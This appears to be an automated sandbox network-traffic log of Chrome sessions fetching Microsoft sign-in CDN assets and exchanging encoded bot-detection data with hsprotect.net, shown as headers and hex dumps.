2024-08-31 22:54:59 UTC	16384	IN	Data Raw: d7 87 04 36 f1 09 0a 0e 33 0c 72 12 a4 78 77 4b 5b 20 9a f4 e9 3a 6c be ba f8 88 e1 7b a7 d1 09 3f 14 30 fb 13 f4 7f a4 1d 8e 33 51 42 0d 0d cf 29 8e 0d 96 59 82 19 b9 cf 13 7c ad a5 de 2b b5 e6 30 b6 bb 29 29 90 a8 f9 4b 58 24 4f d7 28 8e 47 a1 bf 7c 28 df 53 fe fb 0d a4 54 67 a3 61 40 4b b3 fe 8a 61 04 d9 cb 59 ff 3d 87 51 ac b3 c9 30 10 dc 42 7e 4e c2 e4 18 ec 14 ae 7b 0d 8f 17 ec 35 50 45 e2 0c 6a c0 ae ce e8 0b af cd a4 0f a4 35 9d bb bc 3e dd 9f 80 0f f1 5e 55 e1 94 ef 91 3c 8b 82 c0 ae d0 6b f9 61 35 50 cf 44 75 11 4c 96 e7 b3 00 da 2f 73 2a 99 d5 6e fd 24 18 be 0f 28 a0 c6 cf 81 a9 18 24 ee 30 bb f0 27 71 86 12 40 f8 ce 68 ab 00 ac 77 85 ef 57 e8 ca bd f1 a9 6d d7 43 a5 34 7c 79 06 aa 09 2a 13 d8 46 ef c7 7c 42 1c 05 26 81 1f 79 a9 8e 15 2b 03 d0 Data Ascii: 63rxwK[ :l{?03QB)Y\|+0))KX$O(G\|(STga@KaY=Q0B~N{5PEj5>^U<ka5PDuL/sn$($0'q@hwWmC4\|yF\|B&y+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	49782	13.107.246.42	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:55:00 UTC	385	OUT	GET /shared/5/images/2_bc3d32a696895f78c19d.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:55:00 UTC	785	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:55:00 GMT Content-Type: image/svg+xml Content-Length: 673 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Tue, 27 Jun 2023 15:44:22 GMT ETag: 0x8DB7725611C3E0C x-ms-request-id: 74876302-401e-007a-0316-fbde16000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225500Z-16579567576txfkctmnqv2e9c400000005b0000000000u7d x-fd-int-roxy-purgeid: 67912908 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-08-31 22:55:00 UTC	673	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41 Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1#vGal9!9A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	49783	13.107.246.42	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:55:00 UTC	398	OUT	GET /shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:55:00 UTC	807	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:55:00 GMT Content-Type: image/svg+xml Content-Length: 1435 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Tue, 27 Jun 2023 15:44:25 GMT ETag: 0x8DB772562988611 x-ms-request-id: 0527bf39-f01e-007c-6c4e-fbd204000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225500Z-16579567576gnfmq2acf56mm7000000005b000000000g55w x-fd-int-roxy-purgeid: 67912908 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-08-31 22:55:00 UTC	1435	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 Data Ascii: WMo7+uVHJ{&v(QFaWQ\|~\|{~b{8zv8\|bgxby{x<\lSppl7o}vtrr\|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	49785	13.107.246.42	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:55:00 UTC	401	OUT	GET /shared/5/chunks/oneds-analytics-js_8c01a5c09df43fd8d323.js HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:55:00 UTC	819	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:55:00 GMT Content-Type: application/x-javascript Content-Length: 32811 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 09 Aug 2024 21:16:16 GMT ETag: 0x8DCB8B881B52A8D x-ms-request-id: 3833c618-e01e-002d-6c01-f84f88000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225500Z-16579567576s4v5z9ks8mdk6fw00000005fg00000000b5g1 x-fd-int-roxy-purgeid: 67912908 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-08-31 22:55:00 UTC	15565	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 dc bd 6b 57 db 48 b3 3f fa fe 7c 0a 5b 67 0e 5b 1a 1a c7 86 24 93 d8 51 bc 12 42 26 e4 06 13 c8 65 86 61 b3 84 dd 06 0d 46 f2 48 32 84 60 7f f7 53 bf ea 8b 5a b2 48 f2 ac ff 3e e7 c5 9e 35 c1 ea 8b 5a dd d5 d5 d5 55 d5 55 d5 f7 7e 6d b7 5e a6 59 6b 1a 8f 64 92 cb 56 9c 4c d2 ec 32 2a e2 34 69 cd a6 32 a2 ac 5c ca 56 9a c8 71 be 11 25 d1 f4 a6 88 47 f9 c6 3f f9 c9 a3 51 b7 17 3d 18 75 1f 8f 27 f7 b7 26 e3 47 e3 ad cd ad ce 3f 79 e7 ed ee f6 ce fb 83 9d 4e f1 b5 68 fd 7a ef ff f2 e6 68 a2 c8 e2 51 e1 0d fc 5c 4e 27 9d 6b 79 3a 8b 46 17 db e7 f3 e4 e2 e4 32 8f c7 32 29 e2 e2 e6 24 8f f3 39 a5 a3 f0 a7 6a 2d 16 47 c7 41 67 36 cf cf fd a3 a3 fb bf f5 8e c5 6d 6f 73 f3 b7 47 fd c9 3c 19 a1 ff 7e 22 a4 28 82 db a2 93 f9 32 10 45 67 Data Ascii: kWH?\|[g[$QB&eaFH2`SZH>5ZUU~m^YkdVL2*4i2\Vq%G?Q=u'&G?yNhzhQ\N'ky:F22)$9j-GAg6mosG<~"(2Eg
2024-08-31 22:55:00 UTC	16384	IN	Data Raw: f4 b5 4b 71 c3 bd 9a cf ff a0 97 d4 c3 ff 5f fb 97 38 c7 e0 1a bc c6 7d 7c b5 77 72 dd d3 bd 33 7d 33 7b d2 f0 af f8 08 27 9e c7 f6 a1 8f bf 95 e6 a9 63 ae bb 8a 8d 23 42 03 78 ba d1 1b d2 6f df c9 3d d1 b9 27 9e 3a 29 60 36 23 0d 6b 5c 14 6d 03 e9 6c 3e 25 02 be 37 83 d9 2d 11 cd 83 9b 9c e4 87 dd 64 92 1a 38 f3 86 57 84 26 9c 3e 73 a0 36 2a 0a 4c dd 9c 84 e7 c1 fc b4 cc 41 c0 d2 4a 15 95 a1 ae cf c8 0c f7 e3 f6 aa 7a a9 9a 4c dd 4b d5 cc 2c c2 19 95 27 ad c3 0c ac 02 34 25 6c a8 8d a2 93 aa bb 9b 3b 79 79 35 89 06 0d e5 55 ea b9 33 9a 55 79 2d 12 23 95 ab 71 4a 72 de 15 62 ed a5 b4 e9 a6 10 8e 13 de ea d5 2f 9a 4f 55 8c 92 b8 43 b8 55 e0 0e 4d 8e 1b ab de 76 32 49 62 8c 88 30 da ab e9 9c fb e8 ca b3 7b 75 5a 4d fc 90 b2 ac 4d 7f cc 9d 74 ef e0 4c b4 0d Data Ascii: Kq_8}\|wr3}3{'c#Bxo=':)`6#k\ml>%7-d8W&>s6*LAJzLK,'4%l;yy5U3Uy-#qJrb/OUCUMv2Ib0{uZMMtL
2024-08-31 22:55:00 UTC	862	IN	Data Raw: f8 20 3b b4 3c 7b 00 a1 00 34 b8 17 af d3 b1 2e a6 35 fe 2a df b3 9b e8 24 4d 77 d3 e4 4a 76 f8 a6 d0 09 3d 82 36 07 40 c4 5e 1e 85 09 c2 7b be 29 51 5e f1 01 6b cf 55 6d 0c 88 6d a5 49 af aa 3b 83 02 35 da 35 fd d2 55 df 5c 26 38 98 04 e2 b2 e8 04 50 f6 01 2c a1 5c 6d ea 3b c5 95 df e2 7c 04 b4 35 27 15 5a 6d 39 fb 6e e5 10 56 53 5b 2d ee d0 86 d6 98 e0 b5 63 78 83 0d 68 69 4e b3 b1 99 8d 0d 4b 9c f3 8b 46 42 72 d5 3a 30 f0 75 d0 4c 21 a1 55 5a 9f 9d a1 19 67 cd 3a ad 9c 93 e4 b5 75 83 1c 10 ef 06 47 92 af 7d 0d af 14 7e dd 49 2e d3 83 e4 94 7e c5 30 0e 2d 09 27 d8 35 c7 46 be a6 b5 b0 7d 34 ac 3a 5a 86 e3 24 9e 4c e0 de 0e b2 78 02 84 48 38 c4 a9 cc 32 40 a0 f6 5c e7 45 44 e8 56 5a 7c 35 22 e1 68 23 46 af 6b be 7c 7e c3 b7 ba 6f b1 cf 32 05 52 f6 1b cd Data Ascii: ;<{4.5*$MwJv=6@^{)Q^kUmmI;55U\&8P,\m;\|5'Zm9nVS[-cxhiNKFBr:0uL!UZg:uG}~I.~0-'5F}4:Z$LxH82@\EDVZ\|5"h#Fk\|~o2R

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	49791	35.190.10.96	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:55:02 UTC	649	OUT	POST /api/v2/msft HTTP/1.1 Host: collector-pxzc5j78di.hsprotect.net Connection: keep-alive Content-Length: 612 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-type: application/x-www-form-urlencoded Accept: / Origin: https://msft.hsprotect.net Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://msft.hsprotect.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:55:02 UTC	612	OUT	Data Raw: 70 61 79 6c 6f 61 64 3d 61 55 6b 51 52 68 41 49 45 48 39 6b 59 33 64 6b 41 57 4d 47 64 67 42 7a 44 78 41 65 45 46 59 51 43 45 6b 51 5a 77 4a 64 58 32 46 67 5a 31 56 37 65 67 59 50 45 41 67 51 57 6b 5a 47 51 6b 45 49 48 52 31 66 51 56 52 47 48 46 70 42 51 6b 42 64 52 6c 64 52 52 68 78 63 56 30 59 64 57 31 78 57 56 30 6f 63 57 6b 5a 66 58 68 41 65 45 48 38 41 58 58 56 35 61 6d 74 33 63 48 42 46 44 78 41 49 41 78 34 51 56 31 56 2f 59 6d 4e 32 43 30 42 78 65 6c 30 50 45 41 67 51 5a 56 74 63 41 51 41 51 48 68 42 77 57 67 70 49 61 6e 64 77 42 48 39 6c 52 51 38 51 43 41 49 65 45 47 63 43 58 56 39 68 59 47 64 59 65 31 78 42 44 78 41 49 41 41 51 46 42 42 34 51 66 47 47 46 56 63 31 4d 42 63 48 56 77 58 6e 63 50 45 41 67 5e 53 42 42 41 49 43 48 68 42 58 5a 55 70 2f Data Ascii: payload=aUkQRhAIEH9kY3dkAWMGdgBzDxAeEFYQCEkQZwJdX2FgZ1V7egYPEAgQWkZGQkEIHR1fQVRGHFpBQkBdRldRRhxcV0YdW1xWV0ocWkZfXhAeEH8AXXV5amt3cHBFDxAIAx4QV1V/YmN2C0Bxel0PEAgQZVtcAQAQHhBwWgpIandwBH9lRQ8QCAIeEGcCXV9hYGdYe1xBDxAIAAQFBB4QfGGFVc1MBcHVwXncPEAg^SBBAICHhBXZUp/
2024-08-31 22:55:02 UTC	400	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:55:01 GMT Content-Type: application/json; charset=utf-8 Content-Length: 820 Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE Access-Control-Allow-Origin: https://msft.hsprotect.net Timing-Allow-Origin: * Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-08-31 22:55:02 UTC	820	IN	Data Raw: 7b 22 64 6f 22 3a 6e 75 6c 6c 2c 22 6f 62 22 3a 22 59 47 42 67 59 47 42 67 63 7a 39 71 4f 32 30 2f 4f 6a 34 39 49 6a 6b 34 61 6d 77 69 50 6a 35 71 61 53 4a 75 62 54 6b 2f 49 6d 73 2f 4f 6d 35 72 4e 32 30 35 4e 7a 63 2b 61 33 46 78 63 58 46 67 59 44 34 2b 59 47 42 7a 62 48 70 78 63 58 46 78 50 6d 42 67 59 47 41 2b 63 7a 34 39 4f 54 30 38 4f 54 34 2f 4e 7a 38 38 50 6a 77 39 4e 7a 73 39 50 54 67 39 63 58 46 78 63 57 41 2b 50 6a 35 67 59 44 35 67 63 7a 34 34 50 54 6f 2b 4f 7a 73 32 50 7a 30 2b 4f 44 70 78 63 58 46 78 50 6a 34 2b 59 44 35 67 63 32 78 39 4e 6e 39 36 5a 32 56 6a 50 48 70 37 62 48 35 36 5a 6a 67 2f 4f 32 41 2f 63 58 46 78 63 57 41 2b 50 6a 35 67 59 47 41 2b 63 7a 77 33 4f 6a 70 78 63 58 46 78 59 44 34 2b 59 44 34 2b 59 44 35 7a 50 32 6f 37 62 54 Data Ascii: {"do":null,"ob":"YGBgYGBgcz9qO20/Oj49Ijk4amwiPj5qaSJubTk/Ims/Om5rN205Nzc+a3FxcXFgYD4+YGBzbHpxcXFxPmBgYGA+cz49OT08OT4/Nz88Pjw9Nzs9PTg9cXFxcWA+Pj5gYD5gcz44PTo+Ozs2Pz0+ODpxcXFxPj4+YD5gc2x9Nn96Z2VjPHp7bH56Zjg/O2A/cXFxcWA+Pj5gYGA+czw3OjpxcXFxYD4+YD4+YD5zP2o7bT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	49790	34.107.199.61	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:55:02 UTC	591	OUT	GET /ns?c=0d95f950-67ec-11ef-8c21-4b98fcd4657e HTTP/1.1 Host: stk.hsprotect.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://msft.hsprotect.net Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://msft.hsprotect.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:55:02 UTC	153	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:55:02 GMT Content-Type: text/html Content-Length: 244 Access-Control-Allow-Origin: * Connection: close
2024-08-31 22:55:02 UTC	244	IN	Data Raw: 64 66 33 37 38 61 66 64 62 34 66 32 35 64 64 30 35 35 39 36 34 31 63 33 61 30 34 39 31 61 38 62 34 36 36 63 38 62 33 34 38 31 64 38 32 33 30 61 30 38 37 66 32 39 37 61 36 64 32 36 35 39 39 32 32 62 34 62 32 35 39 65 30 35 33 39 35 30 34 61 33 38 62 37 36 35 64 33 30 63 35 62 32 34 65 31 65 32 62 30 31 61 30 64 66 61 38 32 30 38 31 32 38 37 34 34 32 62 33 31 35 36 61 65 37 31 66 62 66 35 39 64 35 32 66 37 38 32 64 36 37 38 31 31 30 34 66 35 62 36 62 39 61 30 34 39 34 62 37 39 63 33 66 31 32 61 38 37 65 33 64 64 61 38 65 63 39 36 66 38 61 37 66 30 63 66 37 31 64 61 31 30 31 64 36 66 62 38 62 61 31 64 37 63 34 62 65 36 34 66 62 64 39 62 63 32 64 34 37 63 31 62 36 66 37 64 63 64 63 32 39 39 64 33 61 30 34 39 37 36 39 34 31 31 Data Ascii: df378afdb4f25dd0559641c3a0491a8b466c8b3481d8230a087f297a6d2659922b4b259e0539504a38b765d30c5b24e1e2b01a0dfa82081287442b3156ae71fbf59d52f782d6781104f5b6b9a0494b79c3f12a87e3dda8ec96f8a7f0cf71da101d6fb8ba1d7c4be64fbd9bc2d47c1b6f7dcdc299d3a049769411

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	49795	35.190.10.96	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:55:02 UTC	369	OUT	GET /api/v2/msft HTTP/1.1 Host: collector-pxzc5j78di.hsprotect.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:55:02 UTC	284	IN	HTTP/1.1 405 Method Not Allowed Date: Sat, 31 Aug 2024 22:55:01 GMT Content-Type: application/json; charset=utf-8 Content-Length: 31 Allow: HEAD, POST, OPTIONS Timing-Allow-Origin: * Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-08-31 22:55:02 UTC	31	IN	Data Raw: 7b 22 65 72 72 6f 72 22 3a 22 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 22 7d 0a Data Ascii: {"error":"Method Not Allowed"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	49796	34.107.199.61	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:55:02 UTC	382	OUT	GET /ns?c=0d95f950-67ec-11ef-8c21-4b98fcd4657e HTTP/1.1 Host: stk.hsprotect.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:55:02 UTC	153	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:55:02 GMT Content-Type: text/html Content-Length: 244 Access-Control-Allow-Origin: * Connection: close
2024-08-31 22:55:02 UTC	244	IN	Data Raw: 32 66 31 61 63 65 61 62 39 64 33 62 38 62 37 36 34 31 34 31 39 37 33 30 35 63 66 39 35 38 31 64 31 39 32 35 33 62 37 64 37 37 38 38 30 34 63 63 65 33 31 31 35 36 34 30 30 66 36 36 30 31 34 36 39 38 33 38 61 65 35 31 61 66 33 39 30 30 33 64 30 37 62 34 37 39 39 33 65 65 66 33 35 61 32 39 65 30 31 32 31 39 62 36 64 64 61 63 63 63 36 35 31 38 36 31 34 31 39 33 66 62 30 66 63 31 62 36 33 61 37 35 64 66 32 62 37 31 30 30 66 64 36 62 32 38 33 38 65 66 32 35 35 37 39 30 34 65 32 66 64 30 64 36 39 38 31 35 37 63 63 35 36 31 38 65 38 32 61 65 65 35 30 30 34 64 30 37 30 33 34 31 30 37 37 62 61 35 35 38 62 39 33 36 63 62 36 63 30 32 61 32 61 38 62 66 37 38 66 66 64 32 64 65 32 35 35 63 65 39 32 32 38 63 39 66 33 31 61 39 65 66 39 62 Data Ascii: 2f1aceab9d3b8b76414197305cf9581d19253b7d778804cce31156400f6601469838ae51af39003d07b47993eef35a29e01219b6ddaccc6518614193fb0fc1b63a75df2b7100fd6b2838ef2557904e2fd0d698157cc5618e82aee5004d070341077ba558b936cb6c02a2a8bf78ffd2de255ce9228c9f31a9ef9b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	49794	13.107.246.42	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:55:02 UTC	599	OUT	GET /images/favicon.ico?v=2 HTTP/1.1 Host: acctcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://signup.live.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:55:02 UTC	743	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:55:02 GMT Content-Type: image/x-icon Content-Length: 17174 Connection: close Cache-Control: public, max-age=604800 Last-Modified: Thu, 29 Aug 2024 20:32:52 GMT ETag: 0x8DCC869C18A99EA x-ms-request-id: 0e587b6c-501e-0024-7e80-fab52c000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225502Z-165795675767jvm9z21nmtw4wn000000058000000000hfa9 x-fd-int-roxy-purgeid: 67912908 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-08-31 22:55:02 UTC	15641	IN	Data Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
2024-08-31 22:55:02 UTC	1533	IN	Data Raw: 80 00 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333""

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	49798	35.190.10.96	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
